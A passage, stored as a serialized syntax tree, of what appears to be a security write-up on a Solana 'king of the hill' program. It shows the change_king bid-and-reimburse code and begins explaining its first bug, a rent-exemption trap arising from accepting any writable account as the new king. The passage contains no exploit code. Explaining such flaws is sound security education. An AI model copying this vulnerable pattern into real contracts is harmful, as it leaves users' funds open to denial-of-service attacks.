change_king",{"type":25,"tag":216,"props":75617,"children":75618},{"style":6964},[75619],{"type":31,"value":1850},{"type":25,"tag":216,"props":75621,"children":75622},{"style":6947},[75623],{"type":31,"value":24240},{"type":25,"tag":216,"props":75625,"children":75626},{"style":6953},[75627],{"type":31,"value":1472},{"type":25,"tag":216,"props":75629,"children":75630},{"style":7375},[75631],{"type":31,"value":24249},{"type":25,"tag":216,"props":75633,"children":75634},{"style":6964},[75635],{"type":31,"value":9757},{"type":25,"tag":216,"props":75637,"children":75638},{"style":7375},[75639],{"type":31,"value":75640},"ChangeKing",{"type":25,"tag":216,"props":75642,"children":75643},{"style":6964},[75644],{"type":31,"value":10582},{"type":25,"tag":216,"props":75646,"children":75647},{"style":6947},[75648],{"type":31,"value":75649},"bid_amount",{"type":25,"tag":216,"props":75651,"children":75652},{"style":6953},[75653],{"type":31,"value":1472},{"type":25,"tag":216,"props":75655,"children":75656},{"style":7375},[75657],{"type":31,"value":9811},{"type":25,"tag":216,"props":75659,"children":75660},{"style":6964},[75661],{"type":31,"value":7036},{"type":25,"tag":216,"props":75663,"children":75664},{"style":6953},[75665],{"type":31,"value":17714},{"type":25,"tag":216,"props":75667,"children":75668},{"style":7375},[75669],{"type":31,"value":17719},{"type":25,"tag":216,"props":75671,"children":75672},{"style":6964},[75673],{"type":31,"value":24291},{"type":25,"tag":216,"props":75675,"children":75676},{"class":6922,"line":7730},[75677],{"type":25,"tag":216,"props":75678,"children":75679},{"style":6927},[75680],{"type":31,"value":75681},"        // Check that bid_amount is at least 2x last_bid_amount\n",{"type":25,"tag":216,"props":75683,"children":75684},{"class":6922,"line":7760},[75685,75689,75693,75697,75701,75705,75709,75713,75717,75722,75726,75731,75735,75739],{"type":25,"tag":216,"props":75686,"children":75687},{"style":7047},[75688],{"type":31,"value":68416},{"type":25,"tag":216,"props":75690,"children":75691},{"style":6964},[75692],{"type":31,"value":1850},{"type":25,"tag":216,"props":75694,"children":75695},{"style":6947},[75696],{"type":31,"value":75649},{"type":25,"tag":216,"props":75698,"children":75699},{"style":6953},[75700],{"type":31,"value":12254},{"type":25,"tag":216,"props":75702,"children":75703},{"style":6947},[75704],{"type":31,"value":29801},{"type":25,"tag":216,"props":75706,"children":75707},{"style":6953},[75708],{"type":31,"value":179},{"type":25,"tag":216,"props":75710,"children":75711},{"style":6964},[75712],{"type":31,"value":18632},{"type":25,"tag":216,"props":75714,"children":75715},{"style":6953},[75716],{"type":31,"value":179},{"type":25,"tag":216,"props":75718,"children":75719},{"style":6964},[75720],{"type":31,"value":75721},"throne",{"type":25,"tag":216,"props":75723,"children":75724},{"style":6953},[75725],{"type":31,"value":179},{"type":25,"tag":216,"props":75727,"children":75728},{"style":6964},[75729],{"type":31,"value":75730},"last_bid_amount ",{"type":25,"tag":216,"props":75732,"children":75733},{"style":6953},[75734],{"type":31,"value":8519},{"type":25,"tag":216,"props":75736,"children":75737},{"style":6989},[75738],{"type":31,"value":11886},{"type":25,"tag":216,"props":75740,"children":75741},{"style":6964},[75742],{"type":31,"value":7797},{"type":25,"tag":216,"props":75744,"children":75745},{"class":6922,"line":7768},[75746,75751],{"type":25,"tag":216,"props":75747,"children":75748},{"style":7047},[75749],{"type":31,"value":75750},"        transfer_from_signer",{"type":25,"tag":216,"props":75752,"children":75753},{"style":6964},[75754],{"type":31,"value":7420},{"type":25,"tag":216,"props":75756,"children":75757},{"class":6922,"line":7800},[75758,75762,75766,75770,75774,75778],{"type":25,"tag":216,"props":75759,"children":75760},{"style":6953},[75761],{"type":31,"value":11636},{"type":25,"tag":216,"props":75763,"children":75764},{"style":6947},[75765],{"type":31,"value":24240},{"type":25,"tag":216,"props":75767,"children":75768},{"style":6953},[75769],{"type":31,"value":179},{"type":25,"tag":216,"props":75771,"children":75772},{"style":6964},[75773],{"type":31,"value":18632},{"type":25,"tag":216,"props":75775,"children":75776},{"style":6953},[75777],{"type":31,"value":179},{"type":25,"tag":216,"props":75779,"children":75780},{"style":6964},[75781],{"type":31,"value":75782},"payer,\n",{"type":25,"tag":216,"props":75784,"children":75785},{"class":6922,"line":7808},[75786,75790,75794,75798,75802,75806,75810,75814,75819],{"type":25,"tag":216,"props":75787,"children":75788},{"style":6953},[75789],{"type":31,"value":11636},{"type":25,"tag":216,"props":75791,"children":75792},{"style":6947},[75793],{"type":31,"value":24240},{"type":25,"tag":216,"props":75795,"children":75796},{"style":6953},[75797],{"type":31,"value":179},{"type":25,"tag":216,"props":75799,"children":75800},{"style":6964},[75801],{"type":31,"value":18632},{"type":25,"tag":216,"props":75803,"children":75804},{"style":6953},[75805],{"type":31,"value":179},{"type":25,"tag":216,"props":75807,"children":75808},{"style":6964},[75809],{"type":31,"value":75721},{"type":25,"tag":216,"props":75811,"children":75812},{"style":6953},[75813],{"type":31,"value":179},{"type":25,"tag":216,"props":75815,"children":75816},{"style":7047},[75817],{"type":31,"value":75818},"to_account_info",{"type":25,"tag":216,"props":75820,"children":75821},{"style":6964},[75822],{"type":31,"value":7448},{"type":25,"tag":216,"props":75824,"children":75825},{"class":6922,"line":7868},[75826,75831],{"type":25,"tag":216,"props":75827,"children":75828},{"style":6947},[75829],{"type":31,"value":75830},"            bid_amount",{"type":25,"tag":216,"props":75832,"children":75833},{"style":6964},[75834],{"type":31,"value":7465},{"type":25,"tag":216,"props":75836,"children":75837},{"class":6922,"line":13001},[75838,75843,75847],{"type":25,"tag":216,"props":75839,"children":75840},{"style":6964},[75841],{"type":31,"value":75842},"        )",{"type":25,"tag":216,"props":75844,"children":75845},{"style":6953},[75846],{"type":31,"value":604},{"type":25,"tag":216,"props":75848,"children":75849},{"style":6964},[75850],{"type":31,"value":6967},{"type":25,"tag":216,"props":75852,"children":75853},{"class":6922,"line":13019},[75854],{"type":25,"tag":216,"props":75855,"children":75856},{"emptyLinePlaceholder":16},[75857],{"type":31,"value":7642},{"type":25,"tag":216,"props":75859,"children":75860},{"class":6922,"line":13064},[75861],{"type":25,"tag":216,"props":75862,"children":75863},{"style":6927},[75864],{"type":31,"value":75865},"        // Reimburse 95% of the last bid to the old king\n",{"type":25,"tag":216,"props":75867,"children":75868},{"class":6922,"line":13170},[75869,75873,75878,75882,75886,75890,75894,75898,75902,75906,75910,75914,75918,75923,75927,75931,75936],{"type":25,"tag":216,"props":75870,"children":75871},{"style":6936},[75872],{"type":31,"value":7011},{"type":25,"tag":216,"props":75874,"children":75875},{"style":6947},[75876],{"type":31,"value":75877}," to_reimburse",{"type":25,"tag":216,"props":75879,"children":75880},{"style":6953},[75881],{"type":31,"value":6956},{"type":25,"tag":216,"props":75883,"children":75884},{"style":6964},[75885],{"type":31,"value":7016},{"type":25,"tag":216,"props":75887,"children":75888},{"style":6947},[75889],{"type":31,"value":24240},{"type":25,"tag":216,"props":75891,"children":75892},{"style":6953},[75893],{"type":31,"value":179},{"type":25,"tag":216,"props":75895,"children":75896},{"style":6964},[75897],{"type":31,"value":18632},{"type":25,"tag":216,"props":75899,"children":75900},{"style":6953},[75901],{"type":31,"value":179},{"type":25,"tag":216,"props":75903,"children":75904},{"style":6964},[75905],{"type":31,"value":75721},{"type":25,"tag":216,"props":75907,"children":75908},{"style":6953},[75909],{"type":31,"value":179},{"type":25,"tag":216,"props":75911,"children":75912},{"style":6964},[75913],{"type":31,"value":75730},{"type":25,"tag":216,"props":75915,"children":75916},{"style":6953},[75917],{"type":31,"value":8519},{"type":25,"tag":216,"props":75919,"children":75920},{"style":6989},[75921],{"type":31,"value":75922}," 9500",{"type":25,"tag":216,"props":75924,"children":75925},{"style":6964},[75926],{"type":31,"value":7036},{"type":25,"tag":216,"props":75928,"children":75929},{"style":6953},[75930],{"type":31,"value":5755},{"type":25,"tag":216,"props":75932,"children":75933},{"style":6989},[75934],{"type":31,"value":75935}," 10000",{"type":25,"tag":216,"props":75937,"children":75938},{"style":6964},[75939],{"type":31,"value":6967},{"type":25,"tag":216,"props":75941,"children":75942},{"class":6922,"line":27455},[75943,75948],{"type":25,"tag":216,"props":75944,"children":75945},{"style":7047},[75946],{"type":31,"value":75947},"        transfer_from_pda",{"type":25,"tag":216,"props":75949,"children":75950},{"style":6964},[75951],{"type":31,"value":7420},{"type":25,"tag":216,"props":75953,"children":75954},{"class":6922,"line":27490},[75955,75959,75963,75967,75971,75975,75979,75983,75987],{"type":25,"tag":216,"props":75956,"children":75957},{"style":6953},[75958],{"type":31,"value":11636},{"type":25,"tag":216,"props":75960,"children":75961},{"style":6947},[75962],{"type":31,"value":24240},{"type":25,"tag":216,"props":75964,"children":75965},{"style":6953},[75966],{"type":31,"value":179},{"type":25,"tag":216,"props":75968,"children":75969},{"style":6964},[75970],{"type":31,"value":18632},{"type":25,"tag":216,"props":75972,"children":75973},{"style":6953},[75974],{"type":31,"value":179},{"type":25,"tag":216,"props":75976,"children":75977},{"style":6964},[75978],{"type":31,"value":75721},{"type":25,"tag":216,"props":75980,"children":75981},{"style":6953},[75982],{"type":31,"value":179},{"type":25,"tag":216,"props":75984,"children":75985},{"style":7047},[75986],{"type":31,"value":75818},{"type":25,"tag":216,"props":75988,"children":75989},{"style":6964},[75990],{"type":31,"value":7448},{"type":25,"tag":216,"props":75992,"children":75993},{"class":6922,"line":27498},[75994,75998,76002,76006,76010,76014],{"type":25,"tag":216,"props":75995,"children":75996},{"style":6953},[75997],{"type":31,"value":11636},{"type":25,"tag":216,"props":75999,"children":76000},{"style":6947},[76001],{"type":31,"value":24240},{"type":25,"tag":216,"props":76003,"children":76004},{"style":6953},[76005],{"type":31,"value":179},{"type":25,"tag":216,"props":76007,"children":76008},{"style":6964},[76009],{"type":31,"value":18632},{"type":25,"tag":216,"props":76011,"children":76012},{"style":6953},[76013],{"type":31,"value":179},{"type":25,"tag":216,"props":76015,"children":76016},{"style":6964},[76017],{"type":31,"value":76018},"old_king,\n",{"type":25,"tag":216,"props":76020,"children":76021},{"class":6922,"line":27506},[76022,76027],{"type":25,"tag":216,"props":76023,"children":76024},{"style":6947},[76025],{"type":31,"value":76026},"            to_reimburse",{"type":25,"tag":216,"props":76028,"children":76029},{"style":6964},[76030],{"type":31,"value":7465},{"type":25,"tag":216,"props":76032,"children":76033},{"class":6922,"line":27515},[76034,76038,76042],{"type":25,"tag":216,"props":76035,"children":76036},{"style":6964},[76037],{"type":31,"value":75842},{"type":25,"tag":216,"props":76039,"children":76040},{"style":6953},[76041],{"type":31,"value":604},{"type":25,"tag":216,"props":76043,"children":76044},{"style":6964},[76045],{"type":31,"value":6967},{"type":25,"tag":216,"props":76047,"children":76048},{"class":6922,"line":27557},[76049],{"type":25,"tag":216,"props":76050,"children":76051},{"emptyLinePlaceholder":16},[76052],{"type":31,"value":7642},{"type":25,"tag":216,"props":76054,"children":76055},{"class":6922,"line":27590},[76056],{"type":25,"tag":216,"props":76057,"children":76058},{"style":6927},[76059],{"type":31,"value":76060},"        // Set new king\n",{"type":25,"tag":216,"props":76062,"children":76063},{"class":6922,"line":27598},[76064,76068,76072,76076,76080,76084,76088,76093,76097,76101,76105,76109,76113,76118,76122,76127],{"type":25,"tag":216,"props":76065,"children":76066},{"style":6947},[76067],{"type":31,"value":30144},{"type":25,"tag":216,"props":76069,"children":76070},{"style":6953},[76071],{"type":31,"value":179},{"type":25,"tag":216,"props":76073,"children":76074},{"style":6964},[76075],{"type":31,"value":18632},{"type":25,"tag":216,"props":76077,"children":76078},{"style":6953},[76079],{"type":31,"value":179},{"type":25,"tag":216,"props":76081,"children":76082},{"style":6964},[76083],{"type":31,"value":75721},{"type":25,"tag":216,"props":76085,"children":76086},{"style":6953},[76087],{"type":31,"value":179},{"type":25,"tag":216,"props":76089,"children":76090},{"style":6964},[76091],{"type":31,"value":76092},"king ",{"type":25,"tag":216,"props":76094,"children":76095},{"style":6953},[76096],{"type":31,"value":266},{"type":25,"tag":216,"props":76098,"children":76099},{"style":6947},[76100],{"type":31,"value":29801},{"type":25,"tag":216,"props":76102,"children":76103},{"style":6953},[76104],{"type":31,"value":179},{"type":25,"tag":216,"props":76106,"children":76107},{"style":6964},[76108],{"type":31,"value":18632},{"type":25,"tag":216,"props":76110,"children":76111},{"style":6953},[76112],{"type":31,"value":179},{"type":25,"tag":216,"props":76114,"children":76115},{"style":6964},[76116],{"type":31,"value":76117},"new_king",{"type":25,"tag":216,"props":76119,"children":76120},{"style":6953},[76121],{"type":31,"value":179},{"type":25,"tag":216,"props":76123,"children":76124},{"style":7047},[76125],{"type":31,"value":76126},"key",{"type":25,"tag":216,"props":76128,"children":76129},{"style":6964},[76130],{"type":31,"value":7633},{"type":25,"tag":216,"props":76132,"children":76133},{"class":6922,"line":27606},[76134,76138,76142,76146,76150,76154,76158,76162,76166,76171],{"type":25,"tag":216,"props":76135,"children":76136},{"style":6947},[76137],{"type":31,"value":30144},{"type":25,"tag":216,"props":76139,"children":76140},{"style":6953},[76141],{"type":31,"value":179},{"type":25,"tag":216,"props":76143,"children":76144},{"style":6964},[76145],{"type":31,"value":18632},{"type":25,"tag":216,"props":76147,"children":76148},{"style":6953},[76149],{"type":31,"value":179},{"type":25,"tag":216,"props":76151,"children":76152},{"style":6964},[76153],{"type":31,"value":75721},{"type":25,"tag":216,"props":76155,"children":76156},{"style":6953},[76157],{"type":31,"value":179},{"type":25,"tag":216,"props":76159,"children":76160},{"style":6964},[76161],{"type":31,"value":75730},{"type":25,"tag":216,"props":76163,"children":76164},{"style":6953},[76165],{"type":31,"value":266},{"type":25,"tag":216,"props":76167,"children":76168},{"style":6947},[76169],{"type":31,"value":76170}," bid_amount",{"type":25,"tag":216,"props":76172,"children":76173},{"style":6964},[76174],{"type":31,"value":6967},{"type":25,"tag":216,"props":76176,"children":76177},{"class":6922,"line":27615},[76178,76182,76186,76190,76194,76198,76202,76207,76211,76216,76220,76224,76228,76232,76237,76241,76245],{"type":25,"tag":216,"props":76179,"children":76180},{"style":6947},[76181],{"type":31,"value":30144},{"type":25,"tag":216,"props":76183,"children":76184},{"style":6953},[76185],{"type":31,"value":179},{"type":25,"tag":216,"props":76187,"children":76188},{"style":6964},[76189],{"type":31,"value":18632},{"type":25,"tag":216,"props":76191,"children":76192},{"style":6953},[76193],{"type":31,"value":179},{"type":25,"tag":216,"props":76195,"children":76196},{"style":6964},[76197],{"type":31,"value":75721},{"type":25,"tag":216,"props":76199,"children":76200},{"style":6953},[76201],{"type":31,"value":179},{"type":25,"tag":216,"props":76203,"children":76204},{"style":6964},[76205],{"type":31,"value":76206},"last_time ",{"type":25,"tag":216,"props":76208,"children":76209},{"style":6953},[76210],{"type":31,"value":266},{"type":25,"tag":216,"props":76212,"children":76213},{"style":7375},[76214],{"type":31,"value":76215}," Clock",{"type":25,"tag":216,"props":76217,"children":76218},{"style":6953},[76219],{"type":31,"value":7438},{"type":25,"tag":216,"props":76221,"children":76222},{"style":7047},[76223],{"type":31,"value":20310},{"type":25,"tag":216,"props":76225,"children":76226},{"style":6964},[76227],{"type":31,"value":17836},{"type":25,"tag":216,"props":76229,"children":76230},{"style":6953},[76231],{"type":31,"value":7081},{"type":25,"tag":216,"props":76233,"children":76234},{"style":6964},[76235],{"type":31,"value":76236},"unix_timestamp ",{"type":25,"tag":216,"props":76238,"children":76239},{"style":6936},[76240],{"type":31,"value":12795},{"type":25,"tag":216,"props":76242,"children":76243},{"style":7375},[76244],{"type":31,"value":9811},{"type":25,"tag":216,"props":76246,"children":76247},{"style":6964},[76248],{"type":31,"value":6967},{"type":25,"tag":216,"props":76250,"children":76251},{"class":6922,"line":27691},[76252],{"type":25,"tag":216,"props":76253,"children":76254},{"emptyLinePlaceholder":16},[76255],{"type":31,"value":7642},{"type":25,"tag":216,"props":76257,"children":76258},{"class":6922,"line":27724},[76259,76263],{"type":25,"tag":216,"props":76260,"children":76261},{"style":7375},[76262],{"type":31,"value":18769},{"type":25,"tag":216,"props":76264,"children":76265},{"style":6964},[76266],{"type":31,"value":18295},{"type":25,"tag":216,"props":76268,"children":76269},{"class":6922,"line":27732},[76270],{"type":25,"tag":216,"props":76271,"children":76272},{"style":6964},[76273],{"type":31,"value":7311},{"type":25,"tag":216,"props":76275,"children":76276},{"class":6922,"line":27740},[76277],{"type":25,"tag":216,"props":76278,"children":76279},{"style":6964},[76280],{"type":31,"value":7874},{"type":25,"tag":38,"props":76282,"children":76283},{},[76284],{"type":31,"value":76285},"Note this comment:",{"type":25,"tag":34,"props":76287,"children":76288},{},[76289],{"type":25,"tag":38,"props":76290,"children":76291},{},[76292],{"type":31,"value":76293},"any writable account is allowed as a new king.",{"type":25,"tag":38,"props":76295,"children":76296},{},[76297],{"type":31,"value":76298},"...Is our assumption correct?",{"type":25,"tag":26,"props":76300,"children":76302},{"id":76301},"the-bugs-lurking-beneath",[76303],{"type":31,"value":76304},"The Bugs Lurking Beneath",{"type":25,"tag":606,"props":76306,"children":76308},{"id":76307},"bug-1-the-rent-exemption-trap",[76309],{"type":31,"value":76310},"Bug 1: The Rent-Exemption Trap",{"type":25,"tag":38,"props":76312,"children":76313},{},[76314,76316,76321],{"type":31,"value":76315},"On Solana, all accounts must maintain a ",{"type":25,"tag":9273,"props":76317,"children":76318},{},[76319],{"type":31,"value":76320},"minimum balance",{"type":31,"value":76322}," of lamports to remain rent-exempt. Specifically, an account can be in one of two states:",{"type":25,"tag":2039,"props":76324,"children":76325},{},[76326,76341],{"type":25,"tag":2043,"props":76327,"children":76328},{},[76329,76334,76335],{"type":25,"tag":9273,"props":76330,"children":76331},{},[76332],{"type":31,"value":76333},"Uninitialized",{"type":31,"value":19288},{"type":25,"tag":82,"props":76336,"children":76338},{"className":76337},[],[76339],{"type":31,"value":76340},"lamports = 0",{"type":25,"tag":2043,"props":76342,"children":76343},{},[76344,76349,76350],{"type":25,"tag":9273,"props":76345,"children":76346},{},[76347],{"type":31,"value":76348},"Initialized",{"type":31,"value":19288},{"type":25,"tag":82,"props":76351,"children":76353},{"className":76352},[],[76354],{"type":31,"value":76355},"lamports >= rent-exempt threshold",{"type":25,"tag":38,"props":76357,"children":76358},{},[76359,76361,76366],{"type":31,"value":76360},"This rent model exists to prevent low-cost DoS attacks on validators. The key idea is that even an account with no data (i.e., zero-length data buffer) still consumes on-chain resources; specifically, ",{"type":25,"tag":9273,"props":76362,"children":76363},{},[76364],{"type":31,"value":76365},"account metadata",{"type":31,"value":76367}," like its public key, owner, or lamport balance. That metadata must be stored persistently by validators, and that storage isn't free.",{"type":25,"tag":38,"props":76369,"children":76370},{},[76371,76373,76379],{"type":31,"value":76372},"So “persistent state” on Solana doesn’t just mean your program's data — it includes the base account structure itself. Even accounts with ",{"type":25,"tag":82,"props":76374,"children":76376},{"className":76375},[],[76377],{"type":31,"value":76378},"data.len() == 0",{"type":31,"value":76380}," must meet a minimum rent threshold to remain alive and avoid garbage collection by the runtime.",{"type":25,"tag":38,"props":76382,"children":76383},{},[76384,76386,76392],{"type":31,"value":76385},"This is enforced at the runtime level, and the relevant logic can be found ",{"type":25,"tag":162,"props":76387,"children":76390},{"href":76388,"rel":76389},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/svm-rent-collector/src/svm_rent_collector.rs#L117-L136",[166],[76391],{"type":31,"value":51553},{"type":31,"value":179},{"type":25,"tag":206,"props":76394,"children":76396},{"className":6915,"code":76395,"language":6914,"meta":7,"style":7},"    fn transition_allowed(&self, pre_rent_state: &RentState, post_rent_state: &RentState) -> bool {\n        match post_rent_state {\n            RentState::Uninitialized | RentState::RentExempt => true,\n            RentState::RentPaying {\n                data_size: post_data_size,\n                lamports: post_lamports,\n            } => {\n                match pre_rent_state {\n                    RentState::Uninitialized | RentState::RentExempt => false,\n                    RentState::RentPaying {\n                        data_size: pre_data_size,\n                        lamports: pre_lamports,\n                    } => {\n                        // Cannot remain RentPaying if resized or credited.\n                        post_data_size == pre_data_size && post_lamports \u003C= pre_lamports\n                    }\n                }\n            }\n        }\n    }\n",[76397],{"type":25,"tag":82,"props":76398,"children":76399},{"__ignoreMap":7},[76400,76484,76501,76547,76567,76588,76609,76624,76641,76685,76704,76725,76746,76762,76770,76803,76810,76817,76824,76831],{"type":25,"tag":216,"props":76401,"children":76402},{"class":6922,"line":6923},[76403,76408,76413,76417,76421,76425,76429,76434,76438,76442,76447,76451,76456,76460,76464,76468,76472,76476,76480],{"type":25,"tag":216,"props":76404,"children":76405},{"style":6936},[76406],{"type":31,"value":76407},"    fn",{"type":25,"tag":216,"props":76409,"children":76410},{"style":7047},[76411],{"type":31,"value":76412}," transition_allowed",{"type":25,"tag":216,"props":76414,"children":76415},{"style":6964},[76416],{"type":31,"value":1850},{"type":25,"tag":216,"props":76418,"children":76419},{"style":6953},[76420],{"type":31,"value":7059},{"type":25,"tag":216,"props":76422,"children":76423},{"style":6936},[76424],{"type":31,"value":17670},{"type":25,"tag":216,"props":76426,"children":76427},{"style":6964},[76428],{"type":31,"value":7026},{"type":25,"tag":216,"props":76430,"children":76431},{"style":6947},[76432],{"type":31,"value":76433},"pre_rent_state",{"type":25,"tag":216,"props":76435,"children":76436},{"style":6953},[76437],{"type":31,"value":1472},{"type":25,"tag":216,"props":76439,"children":76440},{"style":6953},[76441],{"type":31,"value":11093},{"type":25,"tag":216,"props":76443,"children":76444},{"style":7375},[76445],{"type":31,"value":76446},"RentState",{"type":25,"tag":216,"props":76448,"children":76449},{"style":6964},[76450],{"type":31,"value":7026},{"type":25,"tag":216,"props":76452,"children":76453},{"style":6947},[76454],{"type":31,"value":76455},"post_rent_state",{"type":25,"tag":216,"props":76457,"children":76458},{"style":6953},[76459],{"type":31,"value":1472},{"type":25,"tag":216,"props":76461,"children":76462},{"style":6953},[76463],{"type":31,"value":11093},{"type":25,"tag":216,"props":76465,"children":76466},{"style":7375},[76467],{"type":31,"value":76446},{"type":25,"tag":216,"props":76469,"children":76470},{"style":6964},[76471],{"type":31,"value":7036},{"type":25,"tag":216,"props":76473,"children":76474},{"style":6953},[76475],{"type":31,"value":17714},{"type":25,"tag":216,"props":76477,"children":76478},{"style":7375},[76479],{"type":31,"value":16006},{"type":25,"tag":216,"props":76481,"children":76482},{"style":6964},[76483],{"type":31,"value":7241},{"type":25,"tag":216,"props":76485,"children":76486},{"class":6922,"line":6769},[76487,76492,76497],{"type":25,"tag":216,"props":76488,"children":76489},{"style":6973},[76490],{"type":31,"value":76491},"        match",{"type":25,"tag":216,"props":76493,"children":76494},{"style":6947},[76495],{"type":31,"value":76496}," post_rent_state",{"type":25,"tag":216,"props":76498,"children":76499},{"style":6964},[76500],{"type":31,"value":7241},{"type":25,"tag":216,"props":76502,"children":76503},{"class":6922,"line":6778},[76504,76509,76513,76517,76521,76526,76530,76535,76539,76543],{"type":25,"tag":216,"props":76505,"children":76506},{"style":7375},[76507],{"type":31,"value":76508},"            RentState",{"type":25,"tag":216,"props":76510,"children":76511},{"style":6953},[76512],{"type":31,"value":7438},{"type":25,"tag":216,"props":76514,"children":76515},{"style":7375},[76516],{"type":31,"value":76333},{"type":25,"tag":216,"props":76518,"children":76519},{"style":6953},[76520],{"type":31,"value":8218},{"type":25,"tag":216,"props":76522,"children":76523},{"style":7375},[76524],{"type":31,"value":76525}," RentState",{"type":25,"tag":216,"props":76527,"children":76528},{"style":6953},[76529],{"type":31,"value":7438},{"type":25,"tag":216,"props":76531,"children":76532},{"style":7375},[76533],{"type":31,"value":76534},"RentExempt",{"type":25,"tag":216,"props":76536,"children":76537},{"style":6953},[76538],{"type":31,"value":31711},{"type":25,"tag":216,"props":76540,"children":76541},{"style":6936},[76542],{"type":31,"value":16425},{"type":25,"tag":216,"props":76544,"children":76545},{"style":6964},[76546],{"type":31,"value":7465},{"type":25,"tag":216,"props":76548,"children":76549},{"class":6922,"line":7005},[76550,76554,76558,76563],{"type":25,"tag":216,"props":76551,"children":76552},{"style":7375},[76553],{"type":31,"value":76508},{"type":25,"tag":216,"props":76555,"children":76556},{"style":6953},[76557],{"type":31,"value":7438},{"type":25,"tag":216,"props":76559,"children":76560},{"style":7375},[76561],{"type":31,"value":76562},"RentPaying",{"type":25,"tag":216,"props":76564,"children":76565},{"style":6964},[76566],{"type":31,"value":7241},{"type":25,"tag":216,"props":76568,"children":76569},{"class":6922,"line":7110},[76570,76575,76579,76584],{"type":25,"tag":216,"props":76571,"children":76572},{"style":6947},[76573],{"type":31,"value":76574},"                data_size",{"type":25,"tag":216,"props":76576,"children":76577},{"style":6953},[76578],{"type":31,"value":1472},{"type":25,"tag":216,"props":76580,"children":76581},{"style":6947},[76582],{"type":31,"value":76583}," post_data_size",{"type":25,"tag":216,"props":76585,"children":76586},{"style":6964},[76587],{"type":31,"value":7465},{"type":25,"tag":216,"props":76589,"children":76590},{"class":6922,"line":7216},[76591,76596,76600,76605],{"type":25,"tag":216,"props":76592,"children":76593},{"style":6947},[76594],{"type":31,"value":76595},"                lamports",{"type":25,"tag":216,"props":76597,"children":76598},{"style":6953},[76599],{"type":31,"value":1472},{"type":25,"tag":216,"props":76601,"children":76602},{"style":6947},[76603],{"type":31,"value":76604}," post_lamports",{"type":25,"tag":216,"props":76606,"children":76607},{"style":6964},[76608],{"type":31,"value":7465},{"type":25,"tag":216,"props":76610,"children":76611},{"class":6922,"line":7244},[76612,76616,76620],{"type":25,"tag":216,"props":76613,"children":76614},{"style":6964},[76615],{"type":31,"value":74564},{"type":25,"tag":216,"props":76617,"children":76618},{"style":6953},[76619],{"type":31,"value":18779},{"type":25,"tag":216,"props":76621,"children":76622},{"style":6964},[76623],{"type":31,"value":7241},{"type":25,"tag":216,"props":76625,"children":76626},{"class":6922,"line":7257},[76627,76632,76637],{"type":25,"tag":216,"props":76628,"children":76629},{"style":6973},[76630],{"type":31,"value":76631},"                match",{"type":25,"tag":216,"props":76633,"children":76634},{"style":6947},[76635],{"type":31,"value":76636}," pre_rent_state",{"type":25,"tag":216,"props":76638,"children":76639},{"style":6964},[76640],{"type":31,"value":7241},{"type":25,"tag":216,"props":76642,"children":76643},{"class":6922,"line":7275},[76644,76649,76653,76657,76661,76665,76669,76673,76677,76681],{"type":25,"tag":216,"props":76645,"children":76646},{"style":7375},[76647],{"type":31,"value":76648},"                    RentState",{"type":25,"tag":216,"props":76650,"children":76651},{"style":6953},[76652],{"type":31,"value":7438},{"type":25,"tag":216,"props":76654,"children":76655},{"style":7375},[76656],{"type":31,"value":76333},{"type":25,"tag":216,"props":76658,"children":76659},{"style":6953},[76660],{"type":31,"value":8218},{"type":25,"tag":216,"props":76662,"children":76663},{"style":7375},[76664],{"type":31,"value":76525},{"type":25,"tag":216,"props":76666,"children":76667},{"style":6953},[76668],{"type":31,"value":7438},{"type":25,"tag":216,"props":76670,"children":76671},{"style":7375},[76672],{"type":31,"value":76534},{"type":25,"tag":216,"props":76674,"children":76675},{"style":6953},[76676],{"type":31,"value":31711},{"type":25,"tag":216,"props":76678,"children":76679},{"style":6936},[76680],{"type":31,"value":13012},{"type":25,"tag":216,"props":76682,"children":76683},{"style":6964},[76684],{"type":31,"value":7465},{"type":25,"tag":216,"props":76686,"children":76687},{"class":6922,"line":7296},[76688,76692,76696,76700],{"type":25,"tag":216,"props":76689,"children":76690},{"style":7375},[76691],{"type":31,"value":76648},{"type":25,"tag":216,"props":76693,"children":76694},{"style":6953},[76695],{"type":31,"value":7438},{"type":25,"tag":216,"props":76697,"children":76698},{"style":7375},[76699],{"type":31,"value":76562},{"type":25,"tag":216,"props":76701,"children":76702},{"style":6964},[76703],{"type":31,"value":7241},{"type":25,"tag":216,"props":76705,"children":76706},{"class":6922,"line":7305},[76707,76712,76716,76721],{"type":25,"tag":216,"props":76708,"children":76709},{"style":6947},[76710],{"type":31,"value":76711},"                        data_size",{"type":25,"tag":216,"props":76713,"children":76714},{"style":6953},[76715],{"type":31,"value":1472},{"type":25,"tag":216,"props":76717,"children":76718},{"style":6947},[76719],{"type":31,"value":76720}," pre_data_size",{"type":25,"tag":216,"props":76722,"children":76723},{"style":6964},[76724],{"type":31,"value":7465},{"type":25,"tag":216,"props":76726,"children":76727},{"class":6922,"line":7557},[76728,76733,76737,76742],{"type":25,"tag":216,"props":76729,"children":76730},{"style":6947},[76731],{"type":31,"value":76732},"                        lamports",{"type":25,"tag":216,"props":76734,"children":76735},{"style":6953},[76736],{"type":31,"value":1472},{"type":25,"tag":216,"props":76738,"children":76739},{"style":6947},[76740],{"type":31,"value":76741}," pre_lamports",{"type":25,"tag":216,"props":76743,"children":76744},{"style":6964},[76745],{"type":31,"value":7465},{"type":25,"tag":216,"props":76747,"children":76748},{"class":6922,"line":7574},[76749,76754,76758],{"type":25,"tag":216,"props":76750,"children":76751},{"style":6964},[76752],{"type":31,"value":76753},"                    } ",{"type":25,"tag":216,"props":76755,"children":76756},{"style":6953},[76757],{"type":31,"value":18779},{"type":25,"tag":216,"props":76759,"children":76760},{"style":6964},[76761],{"type":31,"value":7241},{"type":25,"tag":216,"props":76763,"children":76764},{"class":6922,"line":7591},[76765],{"type":25,"tag":216,"props":76766,"children":76767},{"style":6927},[76768],{"type":31,"value":76769},"                        // Cannot remain RentPaying if resized or credited.\n",{"type":25,"tag":216,"props":76771,"children":76772},{"class":6922,"line":7604},[76773,76778,76782,76786,76790,76794,76798],{"type":25,"tag":216,"props":76774,"children":76775},{"style":6947},[76776],{"type":31,"value":76777},"                        